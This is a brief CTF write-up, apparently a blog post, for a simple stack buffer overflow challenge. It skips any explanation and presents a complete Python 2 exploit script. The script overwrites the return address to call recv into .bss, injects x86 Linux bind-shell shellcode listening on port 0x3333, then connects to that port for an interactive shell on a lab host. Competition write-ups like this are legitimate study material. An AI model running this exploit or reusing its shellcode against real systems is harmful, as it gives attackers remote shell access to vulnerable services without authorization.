Somehow the 100-point problem turned out harder than the 200-point one...
It is a very simple stack buffer overflow, so I'll skip the explanation.
```python
# Python 2 exploit script (print statements, str-based shellcode)
from hackutil import *      # custom helper module: provides p32() and printPayload()
from socket import *
from time import *
from telnetlib import *

HOST = '192.168.136.180'
PORT = 7777

#=====================================
Dummy    = 'write'          # command keyword that precedes the overflowing argument
recv_plt = 0x08048780       # recv@plt
bss      = 0x0804b0a0       # .bss address used as the buffer for the second stage

# x86 Linux bind shell, listens on TCP port 0x3333
shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66"
             "\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89"
             "\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52"
             "\x66\x68\x33\x33\x66\x53\x89\xe1\x6a\x10"
             "\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04"
             "\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3"
             "\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3"
             "\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
             "\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68"
             "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
             "\xe1\x52\x89\xe2\xb0\x0b\xcd\x80")   # bind port : 0x3333
#=====================================

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print s.recv(1024)

print "==================[ Phase 1 : Inject Payload ]=================="
# 0xF0 bytes of filler reach the saved return address. Overwrite it with
# recv@plt, make recv's return address bss, and pass recv(4, bss, 0x1000, 0)
# as its arguments (fd 4 being the client socket), so the next line we send
# is read into .bss and then executed when recv returns there.
payload  = Dummy + 'A' * 0xF0 + p32(recv_plt) + p32(bss)
payload += p32(4) + p32(bss) + p32(0x1000) + p32(0)
printPayload(payload)
s.send(payload + '\n')
sleep(1)

print "===============[ Phase 2 : Attack with Shellcode ]=============="
# This is what the injected recv() call stores in .bss
s.send(shellcode + '\n')
sleep(1)

print "===================[ Phase 3 : Got the Shell ]=================="
# Connect to the bind shell the shellcode opened on port 0x3333
s2 = socket(AF_INET, SOCK_STREAM)
s2.connect((HOST, 0x3333))
t = Telnet()
t.sock = s2
t.interact()
s.close()
```